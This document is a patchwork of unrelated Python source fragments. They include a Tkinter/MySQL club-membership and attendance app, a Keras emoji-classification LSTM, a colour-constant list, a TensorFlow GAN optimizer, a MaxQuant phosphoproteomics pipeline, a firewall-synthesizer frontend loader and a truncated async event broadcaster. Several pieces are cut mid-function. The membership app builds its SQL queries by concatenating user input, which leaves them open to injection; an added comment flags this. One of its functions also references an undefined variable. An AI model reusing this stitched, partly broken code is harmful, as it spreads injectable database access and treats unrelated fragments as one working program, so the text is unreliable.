command = "INSERT INTO eventList (name, society, date, members) VALUES ('"+txtCreateEventName.get()+"', '"+txtCreateSociety.get()+"', '"+txtCreateDate.get()+"', ' ');"
cur.execute(command)
db.commit()
messagebox.showinfo("Created","Event created")
def pushEditCheck():
if(editCheck.get()=="1"):
w.entryEditName.configure(state="normal")
w.entryEditUID.configure(state="normal")
w.entryEditSurname.configure(state="normal")
w.entryEditSchool.configure(state="disabled")
w.entryEditPhone.configure(state="normal")
else:
w.entryEditName.configure(state="disabled")
w.entryEditUID.configure(state="disabled")
w.entryEditSurname.configure(state="disabled")
w.entryEditSchool.configure(state="disabled")
w.entryEditPhone.configure(state="disabled")
def editUIDSchoolReturn(p1):
command = "SELECT * FROM memberList WHERE UID ="+txtEditNum.get()+";"
cur.execute(command)
results = cur.fetchall()
command = "SELECT * FROM memberList WHERE schoolID ="+txtEditNum.get()+";"
cur.execute(command)
results1= cur.fetchall()
if(results!=() or results1!=()):
if(results!=()):
for row in results:
UID = row[0]
name = row[1]
surname = row[2]
schoolID = row[3]
phone = row[4]
else:
for row in results1:
UID = row[0]
name = row[1]
surname = row[2]
schoolID = row[3]
phone = row[4]
txtEditName.set(name)
txtEditSurname.set(surname)
txtEditSchoolID.set(schoolID)
txtEditUID.set(UID)
txtEditPhone.set(phone)
else:
messagebox.showerror("Not Found!","Member not found!")
def pushEditMember():
w.frameEditMember.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
w.entryEditName.configure(state="disabled")
w.entryEditUID.configure(state="disabled")
w.entryEditSurname.configure(state="disabled")
w.entryEditSchool.configure(state="disabled")
w.entryEditPhone.configure(state="disabled")
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="normal")
w.TEntry8.focus()
txtEditNum.set("")
txtEditName.set("")
txtEditSurname.set("")
txtEditSchoolID.set("")
txtEditUID.set("")
txtEditPhone.set("")
editCheck.set("0")
def pushEditRemove():
if(editCheck.get()!='1'):
if(txtEditSchoolID.get()!=""):
if (messagebox.askokcancel("Continue?","Member will be deleted?")):
command = "DELETE FROM memberList WHERE schoolID ="+txtEditSchoolID.get()+";"
cur.execute(command)
db.commit()
messagebox.showinfo("Succesful!","Succesfully deleted!")
txtEditName.set("")
txtEditSurname.set("")
txtEditSchoolID.set("")
txtEditUID.set("")
txtEditPhone.set("")
else:
messagebox.showwarning("Error","Empty School ID!")
else:
messagebox.showwarning("Error","You are in editing mode!")
w.TCheckbutton1.focus()
def pushEditSave():
if(editCheck.get()=='1'):
if (messagebox.askokcancel("Continue?","New credientals will be saved?")):
command="UPDATE memberList SET UID='"+txtEditUID.get()+"', name='"+txtEditName.get()+"', surname='"+txtEditSurname.get()+"', phone='"+txtEditPhone.get()+"' WHERE schoolID="+txtEditSchoolID.get()+";"
cur.execute(command)
db.commit()
else:
messagebox.showwarning("Error","You are not in editing mode")
def pushEventList():
print('member_support.pushEventList')
sys.stdout.flush()
def pushAddMemberButton():
adder = txtAddUID.get()+", '"+txtAddName.get()+"', '"+txtAddSurname.get()+"', "+txtAddSchoolID.get()+", '"+txtAddPhone.get()
command = "SELECT * FROM memberList WHERE UID ="+txtAddUID.get()+";"
cur.execute(command)
results = cur.fetchall()
if(results!=()):
for row in results:
schoolID = row[0]
name = row[1]
surname = row[2]
password = row[3]
admin = row[4]
messagebox.showwarning("Member Already Registered!",name+" "+surname+" is already on the list!")
txtAddUID.set("")
txtAddName.set("")
txtAddPhone.set("")
txtAddSurname.set("")
txtAddSchoolID.set("")
w.TEntry3.focus()
else:
command = "INSERT INTO memberList (UID, name, surname, schoolID, phone) VALUES ("+adder+"');"
cur.execute(command)
db.commit()
command="SELECT * FROM memberList WHERE UID ="+txtAddUID.get()+";"
cur.execute(command)
results = cur.fetchall()
if(results!=()):
for row in results:
UID = row[0]
name = row[1]
surname = row[2]
schoolID = row[3]
messagebox.showinfo("Success!",UID+" "+name+" "+surname)
else:
messagebox.showerror("Error","Error not added!")
txtLabelAddInfo.set(name+" "+surname+" added")
txtAddName.set("")
txtAddPhone.set("")
txtAddSchoolID.set("")
txtAddSurname.set("")
txtAddUID.set("")
w.TEntry3.focus()
def pushLogout():
w.frameLogin.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
txtLoginSchoolID.set("")
txtLoginPassword.set("")
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="disabled")
w.TEntry1.focus()
def pushMainMenu():
w.frameLogin.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameAddMember.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameAttendance.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameCreateEvent.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameEditMember.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.framePassword.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.frameTakeAttend.place(relx=-0.01, rely=-0.02, relheight=0, relwidth=0)
w.menubar.entryconfigure("Member Operations",state="normal")
w.menubar.entryconfigure("Event Operations",state="normal")
w.menubar.entryconfig("Change Password",state="normal")
w.menubar.entryconfig("Main Menu",state="disabled")
def pushMemberList():
print('member_support.pushMemberList')
sys.stdout.flush()
def pushSavePassword():
print('member_support.pushSavePassword')
sys.stdout.flush()
def pushTakeAttend():
w.frameAttendance.place(relx=-0.01, rely=-0.02, relheight=1.05, relwidth=1.01)
w.menubar.entryconfigure("Member Operations",state="disabled")
w.menubar.entryconfigure("Event Operations",state="disabled")
w.menubar.entryconfig("Change Password",state="disabled")
w.menubar.entryconfig("Main Menu",state="normal")
command = "SELECT date, name, ID FROM eventList;"
cur.execute(command)
results = cur.fetchall()
w.value_list=results
w.TCombobox1.configure(values=w.value_list)
def takeAttendUIDReturn(p1):
command = "SELECT * FROM memberList WHERE UID ='"+txtAttendUID.get()+"';"
print(txtAttendUID.get())
cur.execute(command)
results = cur.fetchall()
for row in results:
name = row[1]
surname = row[2]
print(results)
if(results!=()):
for row in results:
schoolID = row[3]
command = "SELECT * FROM eventList WHERE ID ="+str(ID)+";"
cur.execute(command)
results = cur.fetchall()
print(results)
for row in results:
members = row[4]
command="UPDATE eventList SET members='"+str(members)+"' '"+" "+str(schoolID)+"' WHERE ID='"+str(ID)+"';"
cur.execute(command)
db.commit()
txtAttendanceInfo.set(name + " " +surname+" added!")
txtAttendUID.set("")
w.TEntry17.focus()
else:
messagebox.showerror("Not on the list","UID not on the list")
def init(top, gui, *args, **kwargs):
global w, top_level, root
w = gui
top_level = top
root = top
def destroy_window():
# Function which closes the window.
global top_level
top_level.destroy()
top_level = None
if __name__ == '__main__':
import member
member.vp_start_gui()
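# Security note (added): the queries above build SQL by string
# concatenation, which is open to SQL injection. A parameterized sketch
# using the same MySQLdb cursor (placeholder values shown):
#
#   cur.execute("SELECT * FROM memberList WHERE UID = %s;", (txtAddUID.get(),))
#   cur.execute(
#       "INSERT INTO memberList (UID, name, surname, schoolID, phone) "
#       "VALUES (%s, %s, %s, %s, %s);",
#       (uid, name, surname, school_id, phone),
#   )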
|
import numpy as np
from utils import *
from keras.models import Model
from keras.layers import Dense, Input, Dropout, LSTM, Activation
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras.initializers import glorot_uniform
maxLen = 10
X_train, Y_train = read_csv("Data/train_emoji.csv")
X_test, Y_test = read_csv("Data/tesss.csv")
idx_to_word, word_to_idx, word_to_vec_map = read_glove_vecs("Data/glove.6B.50d.txt")
def sentence_to_indices(X, word_to_idx, max_len):
m = X.shape[0]
sentence_indices = np.zeros((m, max_len))
for j in range(m):
words = X[j].lower().split()
index = 0
for word in words:
sentence_indices[j][index] = word_to_idx[word]
index += 1
return sentence_indices
def pretrained_embedding_layer(word_to_vec_map, word_to_idx):
vocab_len = len(word_to_idx) + 1 # adding 1 to fit keras embeddings (Mandatory)
emb_dim = word_to_vec_map["cucumber"].shape[0] # 50
emb_matrix = np.zeros((vocab_len, emb_dim))
for word, index in word_to_idx.items():
emb_matrix[index, :] = word_to_vec_map[word]
embedding_layer = Embedding(vocab_len, emb_dim, trainable = False)
embedding_layer.build((None,))
embedding_layer.set_weights([emb_matrix])
return embedding_layer
def Emojify_V2(input_shape, word_to_vec_map, word_to_idx):
sentence_indices = Input(shape=input_shape, dtype=np.int32)
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_idx)
embeddings = embedding_layer(sentence_indices)
X = LSTM(128, return_sequences=True)(embeddings)
X = Dropout(0.5)(X)
X = LSTM(128, return_sequences=False)(X)
X = Dropout(0.5)(X)
X = Dense(5)(X)
X = Activation("softmax")(X)
model = Model(sentence_indices, X)
return model
if __name__ == "__main__":
# X1 = np.array(["funny lol", "lets play baseball", "food is ready for you"])
# X1_indices = sentence_to_indices(X1,word_to_idx, max_len = 5)
# print("X1 =", X1)
# print("X1_indices =", X1_indices)
# print(len(word_to_idx))
# embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_idx)
# print("weights[0][1][3] =", embedding_layer.get_weights()[0][1][3])
model = Emojify_V2((maxLen,), word_to_vec_map, word_to_idx)
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
X_train_indices = sentence_to_indices(X_train, word_to_idx, maxLen)
Y_train_oh = convert_to_one_hot(Y_train, C=5)
model.fit(X_train_indices, Y_train_oh, epochs = 100, batch_size=128, shuffle=True)
X_test_indices = sentence_to_indices(X_test, word_to_idx, maxLen)
Y_test_oh = convert_to_one_hot(Y_test, C=5)
loss, acc = model.evaluate(X_test_indices, Y_test_oh)
print()
print("Test Accuracy = ", acc)
# Change the sentence below to see your prediction. Make sure all the words are in the Glove embeddings.
x_test = np.array(["i want some coffee"])
X_test_indices = sentence_to_indices(x_test, word_to_idx, maxLen)
print(x_test[0] +' '+ label_to_emoji(np.argmax(model.predict(X_test_indices))))
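# A hedged variant (added for illustration) of sentence_to_indices that
# skips out-of-vocabulary words and respects max_len instead of raising
# KeyError / IndexError; the original assumes every word is in the GloVe
# vocabulary and that no sentence exceeds max_len:
#
# def sentence_to_indices_safe(X, word_to_idx, max_len):
#     m = X.shape[0]
#     sentence_indices = np.zeros((m, max_len))
#     for j in range(m):
#         index = 0
#         for word in X[j].lower().split():
#             if word in word_to_idx and index < max_len:
#                 sentence_indices[j][index] = word_to_idx[word]
#                 index += 1
#     return sentence_indices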
|
# Stopwatch colors
BLACK = 0x000000
WHITE = 0xFFFFFF
GRAY = 0x888888
LIGHT_GRAY = 0xEEEEEE
DARK_GRAY = 0x484848
ORANGE = 0xFF8800
DARK_ORANGE = 0xF18701
LIGHT_BLUE = 0x5C92D1
BLUE = 0x0000FF
GREEN = 0x00FF00
PASTEL_GREEN = 0x19DF82
SMOKY_GREEN = 0x03876D
YELLOW = 0xFFFF00
MELLOW_YELLOW = 0xF4ED06
RED = 0xFF0000
DARK_RED = 0xDE0A07
PINK = 0xFFC0CB
PURPLE = 0x952489
DEEP_PURPLE = 0x890C32
BROWN = 0x9B3E25 |
#From https://gist.github.com/EndingCredits/b5f35e84df10d46cfa716178d9c862a3
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.framework import ops
from tensorflow.python.training import optimizer
import tensorflow as tf
import hyperchamber as hc
import inspect
class SocialOptimizer(optimizer.Optimizer):
def __init__(self, learning_rate=0.001, p=0.1, gan=None, config=None, use_locking=False, name="SocialOptimizer", optimizer=None, rho=1, beta=1, gamma=1):
"""https://arxiv.org/pdf/1803.03021.pdf"""
super().__init__(use_locking, name)
self.gan = gan
self.config = config
self._lr_t = learning_rate
self.optimizer = self.gan.create_optimizer(optimizer)
def _prepare(self):
super()._prepare()
self.optimizer._prepare()
def _create_slots(self, var_list):
super()._create_slots(var_list)
self.optimizer._create_slots(var_list)
def _apply_dense(self, grad, var):
return self.optimizer._apply_dense(grad, var)
def apply_gradients(self, grads_and_vars, global_step=None, name=None):
var_list = [ v for _,v in grads_and_vars]
d_vars = []
g_vars = []
for grad,var in grads_and_vars:
if var in self.gan.d_vars():
d_vars += [var]
elif var in self.gan.g_vars():
g_vars += [var]
else:
raise("Couldn't find var in g_vars or d_vars")
w = [tf.Variable(self.config.start_at or 0.0), tf.Variable(self.config.start_at or 0.0)]
Vidv = [self.gan.trainer.d_loss, self.gan.trainer.g_loss]
#Vsoc = [1/2. * self.gan.trainer.d_loss + 1/2.* self.gan.trainer.g_loss, -1/2. * self.gan.trainer.d_loss - 1/2.* self.gan.trainer.g_loss]
Vsoc = [1/2. * self.gan.trainer.d_loss + 1/2.* self.gan.trainer.g_loss, 1/2. * self.gan.trainer.d_loss + 1/2.* self.gan.trainer.g_loss]
wlr = self.config.w_learn_rate or 0.01
wt1 = [w[0] + wlr * (Vidv[0] - Vsoc[0]), w[1] + wlr * (Vidv[1] - Vsoc[1])]
def clamped(net):
return tf.maximum(self.config.min or 0., tf.minimum(net, self.config.max or 1.))
self._prepare()
wt1 = [clamped(wt1[0]),clamped(wt1[1])]
self.gan.add_metric('wt0', wt1[0])
self.gan.add_metric('wt1', wt1[1])
op1 = tf.group(*[tf.assign(w, v) for w,v in zip(w, wt1)]) # store variables
with tf.get_default_graph().control_dependencies([op1]):
Vi = [(1. - w[0]) * Vidv[0] + w[0] * Vsoc[0],
(1. - w[1]) * Vidv[1] + w[1] * Vsoc[1]]
if self.config.reverse_w:
Vi = [(w[0]) * Vidv[0] + (1.0-w[0]) * Vsoc[0],
(w[1]) * Vidv[1] + (1.0-w[1]) * Vsoc[1]]
self.gan.add_metric('w0', w[0])
self.gan.add_metric('w1', w[1])
new_grads = tf.gradients(Vi[0], d_vars) + tf.gradients(Vi[1], g_vars)
self.gan.trainer.d_loss = Vi[0]
self.gan.trainer.g_loss = Vi[1]
        new_grads_and_vars = list(zip(new_grads, d_vars + g_vars))  # pair gradients with vars in matching order (d_vars first, then g_vars)
op3 = self.optimizer.apply_gradients(new_grads_and_vars.copy(), global_step=global_step, name=name)
with tf.get_default_graph().control_dependencies([op3]):
if(self.config.w_l1):
# return to selfish state
wt1 = [wt1[0] + self.config.w_l1 * ((self.config.l1_default or 0.0)-wt1[0]),
wt1[1] + self.config.w_l1 * ((self.config.l1_default or 0.0)-wt1[1])]
op4 = tf.group(*[tf.assign(w, v) for w,v in zip(w, wt1)]) # store variables
with tf.get_default_graph().control_dependencies([op4]):
self.gan.add_metric('l1w0', w[0])
self.gan.add_metric('l1w1', w[1])
return tf.no_op()
else:
return tf.no_op()
def _apply_sparse(self, grad, var):
raise NotImplementedError("Sparse gradient updates are not supported.")
def variables(self):
return self.optimizer.variables()
|
from collections import OrderedDict as odict
import numpy as np
import pandas as pd
import maspy.peptidemethods
import maspy.proteindb
def write_evidence_table(ev, path):
""" Write an updated evidence table file. """
columns = [
'Sequence', 'Modified sequence', 'Sequence start', 'Sequence end',
'Protein Systematic Name', 'Protein Standard Name', 'Phospho (STY)',
'Phospho positions', 'Phospho sites', 'Protein phospho sites',
'Ratio Log2 normalized', 'Ratio Log2', 'Combined Phospho Probability',
'Valid Quantification', 'Raw file', 'Experiment', 'Setup',
'Reverse', 'Potential contaminant', 'S/T-P motif',
]
    ev.loc[:, columns].to_csv(path, sep='\t', index=False)
def write_phosphosite_table(ev, path, prob_cutoff=0):
""" Write a phosphosite table. """
m = np.all([
ev['Valid Quantification'],
ev['Phospho (STY)'] > 0,
ev['Combined Phospho Probability'] >= prob_cutoff,
], axis=0)
headers = [
'Protein Standard Name', 'Protein Systematic Name',
'Phospho (STY)', 'Ratio Log2 normalized',
'Phospho positions', 'Phospho sites', 'S/T-P motif', 'Setup'
]
aggregation = odict([(h, 'first') for h in headers])
aggregation['Ratio Log2 normalized'] = 'mean'
groupby = ['Experiment', 'Protein phospho sites']
phospho_table = ev[m].groupby(groupby, as_index=False).agg(aggregation)
phospho_table.to_csv(path, sep='\t', index=False)
def write_protein_table(ev, path):
""" Write a protein table. """
m = ev['Valid Quantification'] & (ev['Phospho (STY)'] == 0)
headers = ['Protein Systematic Name', 'Ratio Log2 normalized', 'Setup']
aggregation = odict([(h, 'first') for h in headers])
aggregation['Ratio Log2 normalized'] = 'mean'
groupby = ['Experiment', 'Protein Standard Name']
protein_table = ev[m].groupby(groupby, as_index=False).agg(aggregation)
protein_table.to_csv(path, sep='\t', index=False)
def process_evidence(evidence, fasta):
""" Read and process a MaxQuant evidence file. """
ev = pd.read_csv(evidence, sep='\t')
_adjust_mq_version_headers(ev)
proteindb = import_mq_proteindb(fasta)
_add_contamination(ev, '[cont]')
_add_decoy(ev, 'REV__')
_add_proline_count(ev)
_add_protein_names(ev, proteindb)
_add_peptide_positions(ev, proteindb)
_change_mod_sequence(ev)
_add_protein_phospho_annotation(ev, proteindb)
_add_stp_motif(ev, proteindb)
_add_combined_probability(ev)
_add_valid_quant(ev)
_add_log_ratio(ev)
ev, normalization_data = _normalize_ratios(ev)
return ev, normalization_data
def reverse_ratios(ev, experiments):
""" Invert log transformed ratios of the specified experiments. """
for exp in experiments:
m = (ev['Experiment'] == exp) & ev['Valid Quantification']
ev.loc[m, 'Ratio Log2 normalized'] *= -1
def normalize_protein_abundance(ev, protein):
""" Normalize peptide log ratios of protein by the protein abundance.
Peptides are normalized by subtracting the median log ratio of all
non-phosphorylated peptides.
"""
for exp in np.unique(ev['Experiment']):
target_mask = np.all([
ev['Valid Quantification'], ev['Experiment'] == exp,
ev['Protein Standard Name'] == protein,
], axis=0)
norm_mask = (ev['Phospho (STY)'] == 0) & target_mask
median = np.median(ev['Ratio Log2 normalized'][norm_mask])
ev.loc[target_mask, 'Ratio Log2 normalized'] -= median
def import_mq_proteindb(fastapath):
proteindb = maspy.proteindb.importProteinDatabase(
fastapath, minLength=4, maxLength=50, missedCleavage=10,
ignoreIsoleucine=True, headerParser=maspy.proteindb.fastaParseSgd
)
    # Contrary to MasPy, MaxQuant ignores leucine and replaces "L" with "I"
for peptide in list(proteindb.peptides):
new_peptide = peptide.replace('L', 'I')
if new_peptide not in proteindb.peptides:
proteindb.peptides[new_peptide] = proteindb.peptides[peptide]
# Add protein Standard Name EPO1 for YMR124W
proteindb['YMR124W'].name = 'EPO1'
return proteindb
def _add_protein_phospho_annotation(ev, proteindb):
m = (ev['Phospho (STY)'] != 0) & (ev['Reverse'] != '+')
all_phospho_positions = []
all_phospho_sites = []
all_protein_phospho_sites = []
for row_id, row in ev[m].iterrows():
protein = row['Leading Razor Protein']
protein_std = proteindb.proteins[protein].name
start, end = proteindb.peptides[row['Sequence']].proteinPositions[protein]
mod_positions = maspy.peptidemethods.returnModPositions(
row['Modified sequence'], indexStart=start
)
phospho_site_list = list()
for phospho_pos in mod_positions['ph']:
aa = proteindb.proteins[protein].sequence[phospho_pos - 1]
site_string = str(phospho_pos) + '(' + aa + ')'
phospho_site_list.append(site_string)
phospho_positions = ','.join([str(i) for i in mod_positions['ph']])
all_phospho_positions.append(phospho_positions)
phospho_sites = ' / '.join(phospho_site_list)
all_phospho_sites.append(phospho_sites)
protein_phospho_sites = ' - '.join([protein_std, phospho_sites])
all_protein_phospho_sites.append(protein_phospho_sites)
ev['Phospho positions'] = ''
ev.loc[m, 'Phospho positions'] = all_phospho_positions
ev['Phospho sites'] = ''
ev.loc[m, 'Phospho sites'] = all_phospho_sites
ev['Protein phospho sites'] = ''
ev.loc[m, 'Protein phospho sites'] = all_protein_phospho_sites
def _add_stp_motif(ev, proteindb):
m = (ev['Phospho (STY)'] > 0) & (ev['Reverse'] != '+')
stp_annotation = []
for prot, sites in zip(
ev[m]['Leading Razor Protein'],
ev[m]['Phospho positions']
):
annotation = []
for site in map(int, sites.split(',')):
motif = proteindb.proteins[prot].sequence[site - 1:site + 1]
try:
if motif in ['SP', 'TP']:
annotation.append(motif)
else:
annotation.append('-')
except IndexError:
annotation.append('-')
stp_annotation.append(' / '.join(annotation))
ev['S/T-P motif'] = ''
ev.loc[m, 'S/T-P motif'] = stp_annotation
def _change_mod_sequence(ev):
func = lambda s: s.split('_')[1].replace('(', '[').replace(')', ']')
ev['Modified sequence'] = ev['Modified sequence'].apply(func)
def _add_proline_count(ev):
proline_count = [sequence.count('P') for sequence in ev['Sequence']]
ev['P Count'] = proline_count
def _add_protein_names(ev, proteindb):
m = (ev['Reverse'] != '+')
protein_names = []
for protein in ev['Leading Razor Protein'][m]:
protein_names.append(proteindb[protein].name)
ev['Protein Systematic Name'] = ev['Leading Razor Protein'].tolist()
ev['Protein Standard Name'] = ev['Leading Razor Protein'].tolist()
ev.loc[m, 'Protein Standard Name'] = protein_names
def _add_peptide_positions(ev, proteindb):
m = (ev['Reverse'] != '+')
start_positions = []
end_positions = []
for prot, seq in zip(ev['Leading Razor Protein'][m], ev['Sequence'][m]):
start, end = proteindb.peptides[seq].proteinPositions[prot]
start_positions.append(start)
end_positions.append(end)
ev['Sequence start'] = ''
ev.loc[m, 'Sequence start'] = start_positions
ev['Sequence end'] = ''
ev.loc[m, 'Sequence end'] = end_positions
def _add_contamination(ev, contamination_tag):
contamination = []
for protein in ev['Leading Razor Protein']:
if protein.find(contamination_tag) != -1:
contamination.append('+')
else:
contamination.append('')
ev['Potential contaminant'] = contamination
def _add_decoy(ev, decoy_tag):
decoy = []
for protein in ev['Leading Razor Protein']:
if protein.find(decoy_tag) != -1:
decoy.append('+')
else:
decoy.append('')
ev['Reverse'] = decoy
def _add_valid_quant(ev):
""" True if quantified and neiter a contaminant or a decoy protein. """
valid_quantification = np.all([
np.isfinite(ev['Ratio H/L']),
ev['Potential contaminant'] != '+',
ev['Reverse'] != '+',
], axis=0)
ev['Valid Quantification'] = valid_quantification
def _add_combined_probability(ev):
ev['Combined Phospho Probability'] = np.nan
m = (ev['Phospho (STY)'] != 0) & (ev['Type'] != 'MULTI-MATCH')
combined_probabilities = []
for prob, num in zip(
ev['Phospho (STY) Probabilities'][m],
ev['Phospho (STY)'][m]
):
combined_probability = _combined_localization_probability(prob, num)
combined_probabilities.append(combined_probability)
ev.loc[m, 'Combined Phospho Probability'] = combined_probabilities
def _combined_localization_probability(entry, num):
probabilities = _extract_phospho_probabilities(entry)
combined_probability = 1
for probability, site in probabilities[:num]:
combined_probability = combined_probability * probability
return combined_probability
def _extract_phospho_probabilities(entry):
"""
    :param entry: entry of the field "Phospho (STY) Probabilities" from a
        MaxQuant evidence.txt file. For example: "AAADAIS(1)DIEIK"
    :returns: a sorted list (best probabilities first) of tuples, containing a
        probability value and the phospho position (starting from 1).
        For example: [(1.0, 7)]
"""
probabilities = list()
while entry.find('(') != -1:
mod_position = int(entry.find('('))
mod_probability = float(entry.split('(')[1].split(')')[0])
probabilities.append((mod_probability, mod_position))
entry = entry.split('(', 1)[0] + entry.split(')', 1)[1]
return sorted(probabilities, reverse=True)
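# Worked example (hypothetical entry): for "AAS(0.75)DS(0.25)K",
# _extract_phospho_probabilities returns [(0.75, 3), (0.25, 5)], so
# _combined_localization_probability(entry, 2) == 0.75 * 0.25 == 0.1875.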
def _add_log_ratio(ev):
m = ev['Valid Quantification']
ev['Ratio Log2'] = np.nan
ev.loc[m, 'Ratio Log2'] = np.log2(ev['Ratio H/L'][m])
def _normalize_ratios(ev):
groups = []
normalization_data = {}
for exp, group in ev.groupby('Experiment'):
norm_data = _calc_normalization(group)
normalization_data[exp] = norm_data
m = group['Valid Quantification']
corr = (group['P Count'][m] * norm_data['p_shift']) + norm_data['shift']
group['Ratio Log2 normalized'] = np.nan
        group.loc[m, 'Ratio Log2 normalized'] = group['Ratio Log2'][m] - corr  # .loc avoids chained-assignment warnings
groups.append(group)
return pd.concat(groups), normalization_data
def _calc_normalization(ev):
p_masks = []
for pcount in range(3):
p_mask = np.all([
ev['Valid Quantification'],
ev['Phospho (STY)'] == 0,
ev['P Count'] == pcount,
], axis=0)
p_masks.append(p_mask)
    median_P0 = np.median(ev['Ratio Log2'][p_masks[0]])
    median_P1 = np.median(ev['Ratio Log2'][p_masks[1]])
    median_P2 = np.median(ev['Ratio Log2'][p_masks[2]])
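    # Proline shift = per-proline median offset averaged over P1/P2 peptides,
    # weighted by their counts: ((m1-m0)/1*n1 + (m2-m0)/2*n2) / (n1 + n2)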
weighted_p1 = (median_P1 - median_P0) / 1 * p_masks[1].sum()
weighted_p2 = (median_P2 - median_P0) / 2 * p_masks[2].sum()
total_num = p_masks[1].sum() + p_masks[2].sum()
proline_shift = (weighted_p1 + weighted_p2) / total_num
ratio_shift = median_P0
norm_data = {'shift': ratio_shift, 'p_shift': proline_shift}
return norm_data
def _adjust_mq_version_headers(ev):
""" Unify evidence table headers of different MQ versions. """
ev.rename(columns={
'Leading razor protein': 'Leading Razor Protein',
'Leading proteins': 'Leading Proteins'
}, inplace=True)
|
#!/usr/bin/env python2
import os
import pkgutil
import importlib
import fwsynthesizer
from fwsynthesizer.utils import *
FRONTENDS = [ x[1] for x in pkgutil.iter_modules(__path__) ]
class Frontend:
"Frontend object"
def __init__(self, name, diagram, language_converter,
query_configuration=None, interfaces_enabled=True):
"""
Make a Frontend object
Args:
name (str): frontend name
diagram (str): diagram file path
language_converter (Callable[[str,dict], str]): converter callable
query_configuration (callable): query configuration loop
interfaces_enabled (bool): do or do not consider the interfaces
"""
self.name = name
self.diagram = diagram
self.language_converter = language_converter
self.query_configuration = query_configuration
self.interfaces_enabled = interfaces_enabled
def import_frontend(name):
"""
Import a frontend from the frontend package.
Note: each frontend is a python script that must contain a `frontend` variable
with the definition of the Frontend object
"""
if name in FRONTENDS:
frontend = importlib.import_module('.'+name, package="fwsynthesizer.frontends").frontend
frontend.diagram = os.path.join(os.path.dirname(fwsynthesizer.__file__), frontend.diagram)
return frontend
elif os.path.exists(name) and os.path.isfile(name):
return Frontend(name="Generic",
diagram=os.path.abspath(name),
language_converter=lambda x,_: x,
interfaces_enabled=False)
else:
raise RuntimeError("Invalid Frontend '{}'!".format(name))
class LanguageConverter:
"Callable object that converts a configuration file to the generic language"
def __init__(self, parser, converter):
self.parser = parser
self.converter = converter
def __call__(self, contents, interfaces):
contents = preprocess(contents)
ast = self.parser(contents)
rules = self.converter(ast, interfaces)
return rules
def converter(parser, converter):
"Make a LanguageConverter object"
return LanguageConverter(parser, converter)
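# Sketch (hypothetical parser/converter callables):
# frontend = Frontend(name="MyFW", diagram="diagrams/myfw.diagram",
#                     language_converter=converter(parse_myfw, convert_myfw))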
def query_configuration(get_lines, delete_rule):
"Query a configuration and show all the rules that affect the selected packets"
def query_loop(name, diagram, contents, interfaces, query,
languageconverter):
contents = preprocess(contents)
local_addresses = get_local_addresses(interfaces)
lines = get_lines(contents)
rules = languageconverter.parser(contents)
rules_contents = languageconverter.converter(rules, interfaces)
firewall = fwsynthesizer.Firewall(name, diagram, rules_contents, local_addresses)
for i in range(0, len(lines)):
rules1 = delete_rule(rules, i)
rules_contents1 = languageconverter.converter(rules1, interfaces)
            test = fwsynthesizer.Firewall("{}_{}".format(name, i), diagram, rules_contents1, local_addresses)
res = firewall.equivalence(test, query=query)
if not res: print lines[i]
return query_loop
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .gpr import GPR, LRAGPR
__all__ = [
'GPR', 'LRAGPR'
]
|
import asyncio
from typing import Any, Union
from pydantic.main import BaseModel
from .event_notifier import EventNotifier, Subscription, TopicList, ALL_TOPICS
from broadcaster import Broadcast
from .logger import get_logger
from fastapi_websocket_rpc.utils import gen_uid
logger = get_logger('EventBroadcaster')
# Cross service broadcast consts
NotifierId = str
class BroadcastNotification(BaseModel):
notifier_id: NotifierId
topics: TopicList
data: Any
class EventBroadcasterException(Exception):
pass
class BroadcasterAlreadyStarted(EventBroadcasterException):
pass
class EventBroadcasterContextManager:
"""
Manages the context for the EventBroadcaster
    Friend-like class of EventBroadcaster (accessing "protected" members)
"""
def __init__(self, event_broadcaster: "EventBroadcaster", listen: bool = True, share: bool = True) -> None:
"""
        Provide a context manager for an EventBroadcaster, managing whether it listens to events coming from the broadcaster
        and whether it subscribes to the internal notifier to share its events with the broadcaster
Args:
event_broadcaster (EventBroadcaster): the broadcaster we manage the context for.
share (bool, optional): Should we share events with the broadcaster. Defaults to True.
listen (bool, optional): Should we listen for incoming events from the broadcaster. Defaults to True.
"""
self._event_broadcaster = event_broadcaster
self._share: bool = share
self._listen: bool = listen
self._lock = asyncio.Lock()
async def __aenter__(self):
async with self._lock:
if self._listen:
self._event_broadcaster._listen_count += 1
if self._event_broadcaster._listen_count == 1:
                    # We have our first listener: start the read-task for it (and all who follow)
logger.info("Listening for incoming events from broadcast channel (first listener started)")
# Start task listening on incoming broadcasts
self._event_broadcaster.start_reader_task()
if self._share:
self._event_broadcaster._share_count += 1
if self._event_broadcaster._share_count == 1:
# We have our first publisher
# Init the broadcast used for sharing (reading has its own)
self._event_broadcaster._acquire_sharing_broadcast_channel()
logger.debug("Subscribing to ALL_TOPICS, and sharing messages with broadcast channel")
                    # Subscribe to internal events from our own event notifier and broadcast them
await self._event_broadcaster._subscribe_to_all_topics()
else:
logger.debug(f"Did not subscribe to ALL_TOPICS: share count == {self._event_broadcaster._share_count}")
return self
async def __aexit__(self, exc_type, exc, tb):
async with self._lock:
try:
if self._listen:
self._event_broadcaster._listen_count -= 1
# if this was last listener - we can stop the reading task
if self._event_broadcaster._listen_count == 0:
# Cancel task reading broadcast subscriptions
if self._event_broadcaster._subscription_task is not None:
logger.info("Cancelling broadcast listen task")
self._event_broadcaster._subscription_task.cancel()
self._event_broadcaster._subscription_task = None
